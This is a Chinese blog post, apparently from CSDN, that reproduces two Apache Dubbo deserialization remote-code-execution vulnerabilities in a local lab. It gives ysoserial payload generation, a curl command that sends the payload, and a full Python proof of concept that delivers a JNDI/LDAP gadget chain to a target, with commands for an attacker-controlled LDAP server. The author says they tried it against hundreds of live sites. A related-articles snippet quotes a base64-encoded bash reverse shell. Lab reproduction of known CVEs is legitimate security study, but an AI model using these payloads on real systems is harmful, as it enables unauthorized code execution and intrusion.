dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现

最新推荐文章于 2024-04-16 03:05:28 发布
最新推荐文章于 2024-04-16 03:05:28 发布
阅读量2.3k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58434634/article/details/117459022
版权

img

简介

Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。

CVE-2019-17564

漏洞简介

Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。

影响版本

2.7.0 <= Apache Dubbo <= 2.7.4.1

2.6.0 <= Apache Dubbo <= 2.6.7

Apache Dubbo = 2.5.x

漏洞复现

漏洞环境搭建

使用 https://github.com/apache/dubbo-samples 中的 dubbo-samples-http

用IDEA打开后修改pom.xml中的dubbo.version到有漏洞的版本。

image-20210602002357239

还需要使用zookeeper,下载zookeeper后,修改conf 文件夹中的 zoo_sample.cfg 文件名称为zoo.cfg,添加这两行,并创建这两个目录,运行bin\zkServer.cmd文件启动zookeeper。image-20210602002617483

zookeeper启动还会占用8080端口启动个jetty,会和burp的8080代理端口冲突

尝试启动dubbo,看是否能启动成功,在这里踩了很多坑:

  • idea自动下载提示找不到dubbo2.7.3的包,自己手动下载导入了一个
  • 启动的时候又提示编译失败,查了下又是缺少javassist这个包,又下载javassist-3.20.0-GA.jar
  • 启动的时候8080又被占用,查看发现spring/http-provider.xml这个文件配置的tomcat也是用的8080,改成了8081

搞完这些,这个项目才正常跑起来,为了测试方便,还需要下载并导入commons-collections4这个包,不然发送payload后又提示缺少包。

image-20210602004328116

复现步骤

ysoserial生成payload,

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections4 "calc" > payload.out

发送生成payload,漏洞地址为org.apache.dubbo.samples.http.api.DemoService

curl http://127.0.0.1:8081/org.apache.dubbo.samples.http.api.DemoService --data-binary @payload.out

弹出计算器:

image-20210602004643556

网上所有文章复现都是在打/org.apache.dubbo.samples.http.api.DemoService ,然后就以为所有dubbo都会有这个地址。。。。结果试了几百个站全是404。。。(搞完感觉自己是个憨憨)

改过之后再又重新测了一遍,基本没有用http协议的,大多用的还是dubbo协议。。。

CVE-2020-1948

漏洞简介

Dubbo 2.7.6或更低版本采用hessian2实现反序列化,其中存在反序列化远程代码执行漏洞。攻击者可以发送未经验证的服务名或方法名的RPC请求,同时配合附加恶意的参数负载。当服务端存在可以被利用的第三方库时,恶意参数被反序列化后形成可被利用的攻击链,直接对Dubbo服务端进行恶意代码执行。

影响版本

2.7.0 <= Apache Dubbo <= 2.7.7

2.6.0 <= Apache Dubbo <= 2.6.7

Apache Dubbo 全部 2.5.x 版本

漏洞复现

利用脚本如下

需要安装依赖 pip install dubbo-py

import sys

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

if len(sys.argv) < 4:
  print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))
  print('\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))
  sys.exit()

client = DubboClient(sys.argv[1], int(sys.argv[2]))

JdbcRowSetImpl=new_object(
  'com.sun.rowset.JdbcRowSetImpl',
  dataSource=sys.argv[3],
  strMatchColumns=["foo"]
  )
JdbcRowSetImplClass=new_object(
  'java.lang.Class',
  name="com.sun.rowset.JdbcRowSetImpl",
  )
toStringBean=new_object(
  'com.rometools.rome.feed.impl.ToStringBean',
  beanClass=JdbcRowSetImplClass,
  obj=JdbcRowSetImpl
  )

resp = client.send_request_and_return_response(
  service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
  # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
  method_name='$invoke',
  args=[toStringBean])

output = str(resp)
if 'Fail to decode request due to: RpcInvocation' in output:
  print('[!] Target maybe not support deserialization.')
elif 'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()' in output:
   print('[+] Succeed.')
else:
  print('[!] Output:')
  print(output)
  print('[!] Target maybe not use dubbo-remoting library.')

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar开启个ldap监听,执行ping命令,然后运行上面的poc

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping xxxxxx"

python poc.py www.target.com 12345 ldap://www.yourweb:1389/exp

image-20210602012506116

image-20210602012838788

查看dnslog,发现命令成功执行

image-20210602012926780

在这里插入图片描述

安全小工坊
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞笔记(最详细版本)
精品博客,你值得一看~
08-25 1001
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚制的内容贴到双引号里面执行。
《Vulhub-Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)》
weixin_47118413的博客
12-29 821
在之前我想起在Vulhub漏洞平台过Aapche Dubbo Java反序列化漏洞(CVE-2019-17564),虽然不是最新的(CVE-2022-39198)漏洞,但也想把(CVE-2019-17564)分享一下。
【网络安全---漏洞】Tomcat CVE-2024-1938 漏洞和利用过程(特详细)
最新发布
2401_83946826的博客
04-16 1342
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 667
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
rmi 反序列化漏洞_CVE201917564 Apache Dubbo 反序列化漏洞安全通告
weixin_36277690的博客
01-07 251
【背景】2020年2月10号,Apache Dubbo的反序列化漏洞(CVE-2019-17564)被公布,使用 Dubbo-Rpc-Http (2.7.3 or lower) 和Spring-Web (5.1.9.RELEASE or lower)的版本可被利用。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容...
不安全的反序列化_Apache Dubbo反序列化漏洞安全风险通告(CVE201917564)
weixin_39802132的博客
12-11 594
漏洞综述关于Apache DubboApache Dubbo 是一款高性能、轻量级的开源Java RPC框架,该框架在国内应用较为广泛,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发漏洞描述Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,Apache Dubbo HTTP协议中存在反序列化漏洞(CVE-2019-17564...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
在2019年,Apache Dubbo暴露了一个严重的安全漏洞,即CVE-2019-17564,这是一个Http反序列化漏洞。该漏洞发生在启用HTTP远程处理的Dubbo应用程序中,攻击者可以通过发送包含恶意Java对象的POST请求,导致不安全的反...
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
[Timeline Sec] - CVE-2020-1948:Dubbo Provider默认反序列化1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Dubbo 是 阿 里 巴 巴 公 司 开 源 的 一 个 高 性 能 优 秀 的 服 务 框 架 , 使 得
Middleware-Vulnerability-detection:CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15
04-07
--2020.3 CVE-2019-17564 Apache Dubbo反序列化漏洞 --2020.7 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 --2020.10 CVE-2020-13957 Apache Solr 未授权上传 --2020.11 CVE-2020-13942 Apache Unomi 远程代码...
dubbo官方文档_Dubbo爆出严重漏洞! 可远程执行恶意代码!(附解决方案)
weixin_39969060的博客
11-29 82
点击上方“Java技术前线”,选择“置顶或者星标”与你一起成长作者 | 安全客来源 |https://urlify.cn/rii2ye近日检测到Apache Dubbo官方发布了CVE-2019-17564漏洞通告,360灵腾安全实验室判断漏洞等级为高,利用难度低,威胁程度高,影响面大。建议使用用户及时安装最新补丁,以免遭受黑客攻击。0x00 漏洞概述Apche Dubbo是一款高性能...
Apache Dubbo CVE-2020-1948 测试环境
aweiweiweiei1的博客
01-26 241
https://github.com/txrw/Dubbo-CVE-2020-1948
vulhub漏洞十二_dubbo
weixin_44193247的博客
01-18 2208
vulhub漏洞练习篇
Aapche Dubbo 反序列化漏洞(CVE-2019-17564)
0xSec
12-24 759
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
【网络安全】CVE漏洞分析以及
Android_wxf的博客
04-21 1695
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
Aapche Dubbo Java反序列化漏洞CVE-2019-17564)漏洞
weixin_48413667的博客
09-14 1319
一、软件介绍 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。 二、漏洞描述 Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 三、影响范围 Apache Dubbo ...
CVE-2020-11989 漏洞
克豪的博客
11-24 1612
这里的 shiro 拦截器需要设置成map.put("/admin/*", "authc"); 这里有两种poc,都是可以绕过 admin/a%25%32%66a /;/admin/aaa 第一种情况 /admin/a%25%32%66a——>传入到shiro自动解码一次变成/admin/a%2fa——>经过 decodeRequestString 变成/admin/a/a 由于这里我们的拦截器是map.put("/admin/*", "authc");,这里需要了解一下shiro的UR
CVE-2020-1948补丁绕过 Apache Dubbo 远程代码执行漏洞
AmyBaby00的博客
06-30 1064
漏洞背景 2020年06月23日, 360CERT监测发 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948,漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发。 Apache Dubbo Provider 存在 反序列化漏洞,攻击者可以通过RPC请求发送无法识别的服务名称或方法名称以及一些恶意参
CVE-2022-39198
08-09
CVE-2022-39198是影响Apache Dubbo的一个反序列化漏洞。该漏洞存在于Dubbo hessian-lite 3.2.12及之前的版本中。攻击者可以利用这个漏洞在目标系统上执行恶意代码。具体利用方法是通过反序列化操作,触发漏洞函数,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值